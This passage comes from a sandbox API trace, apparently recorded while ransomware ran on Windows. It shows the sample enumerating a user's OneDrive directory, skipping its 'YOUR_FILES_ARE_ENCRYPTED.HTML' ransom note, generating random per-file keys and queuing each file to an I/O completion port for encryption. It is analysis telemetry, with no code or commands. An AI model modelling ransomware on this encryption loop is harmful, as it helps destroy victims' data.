lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0112.239] CloseHandle (hObject=0x31c) returned 1 [0112.239] GetProcessHeap () returned 0x600000 [0112.239] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.239] GetProcessHeap () returned 0x600000 [0112.239] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0112.240] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf111177, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x19a81fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="17.3.5892.0626_2", cAlternateFileName="173589~3.062")) returned 1 [0112.240] StrStrIW (lpFirst="17.3.5892.0626_2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.240] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2") returned 75 [0112.240] GetProcessHeap () returned 0x600000 [0112.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0112.241] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2" [0112.241] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\*" [0112.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf111177, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x19a81fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.242] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf111177, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x19a81fc0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1bc7bb71, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="..", cAlternateFileName="")) returned 1 [0112.243] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd25ab06c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd25ab06c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xd29d7222, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0112.243] StrStrIW (lpFirst="AutoPlayLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.243] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png") returned 92 [0112.243] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0112.243] lstrlenW (lpString=".png") returned 4 [0112.243] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0112.243] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.244] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4668) returned 1 [0112.244] GetProcessHeap () returned 0x600000 [0112.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.247] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F7") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A0") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F5") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="6A") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F3") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="4C") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="36") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="71") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="32") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="88") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="62") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B7") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FE") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="4F") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4E") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="56") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="35") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="95") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="95") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="56") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="FC") returned 2 [0112.247] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="14") returned 2 [0112.247] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="BE") returned 2 [0112.247] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D5") returned 2 [0112.247] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A0") returned 2 [0112.247] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="2D") returned 2 [0112.247] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="F3") returned 2 [0112.248] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="0B") returned 2 [0112.248] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="25") returned 2 [0112.248] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="EE") returned 2 [0112.248] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="CE") returned 2 [0112.248] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5E") returned 2 [0112.248] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayLogo.png" [0112.248] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.248] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.248] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5dd86f0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xd5dd86f0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xd5e70f71, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0112.248] StrStrIW (lpFirst="AutoPlayOptIn.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.248] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif") returned 93 [0112.248] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0112.248] lstrlenW (lpString=".gif") returned 4 [0112.248] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0112.248] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.249] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=383222) returned 1 [0112.249] GetProcessHeap () returned 0x600000 [0112.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.252] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="49") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="8B") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="9B") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="20") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="6F") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="FD") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D5") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="F3") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F2") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="20") returned 2 [0112.252] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="95") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="31") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4A") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="49") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="29") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="F3") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="0D") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B6") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="4D") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1C") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="11") returned 2 [0112.253] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="75") returned 2 [0112.253] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="36") returned 2 [0112.253] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4D") returned 2 [0112.253] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="6D") returned 2 [0112.253] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="12") returned 2 [0112.253] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="38") returned 2 [0112.253] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="F9") returned 2 [0112.253] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="D4") returned 2 [0112.253] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="58") returned 2 [0112.253] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="4F") returned 2 [0112.253] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4E") returned 2 [0112.254] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.gif" [0112.254] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.254] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.254] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda5ab377, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xda5ab377, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xda8f2699, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0112.254] StrStrIW (lpFirst="AutoPlayOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.254] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png") returned 93 [0112.254] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0112.254] lstrlenW (lpString=".png") returned 4 [0112.254] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0112.254] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0112.254] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=10226) returned 1 [0112.254] GetProcessHeap () returned 0x600000 [0112.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0112.256] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="95") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="33") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="04") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="69") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="46") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0B") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="DE") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="0B") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D0") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="1D") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="56") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2C") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="95") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D2") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="24") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="71") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="41") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E4") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="DE") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="8C") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="3E") returned 2 [0112.257] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="30") returned 2 [0112.257] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="44") returned 2 [0112.257] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F9") returned 2 [0112.257] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="94") returned 2 [0112.257] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="7C") returned 2 [0112.257] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="DE") returned 2 [0112.257] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="68") returned 2 [0112.257] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="20") returned 2 [0112.257] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D1") returned 2 [0112.257] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="79") returned 2 [0112.257] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="3C") returned 2 [0112.258] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png" [0112.258] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.258] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0112.258] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbb92c03, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdbb92c03, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc26d7fb, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x16da, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0112.258] StrStrIW (lpFirst="CollectOneDriveLogs.bat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.258] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat") returned 99 [0112.258] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0112.258] lstrlenW (lpString=".bat") returned 4 [0112.258] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0112.258] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0112.259] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=5850) returned 1 [0112.259] GetProcessHeap () returned 0x600000 [0112.259] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0112.262] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EE") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="D8") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="00") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="DD") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="2B") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="41") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B5") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="5D") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D2") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="58") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="4F") returned 2 [0112.262] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="0A") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="51") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="65") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="A6") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="F1") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="7B") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="0F") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="37") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="43") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BF") returned 2 [0112.263] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="9B") returned 2 [0112.263] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="B9") returned 2 [0112.263] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B3") returned 2 [0112.263] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="24") returned 2 [0112.263] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D8") returned 2 [0112.263] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="4E") returned 2 [0112.263] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4D") returned 2 [0112.263] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F2") returned 2 [0112.263] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="9C") returned 2 [0112.263] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="91") returned 2 [0112.263] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="76") returned 2 [0112.264] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\CollectOneDriveLogs.bat" [0112.264] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.264] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0112.264] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcd4e444, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdcd4e444, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdd66554a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x72c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ETWlog.dll", cAlternateFileName="")) returned 1 [0112.264] 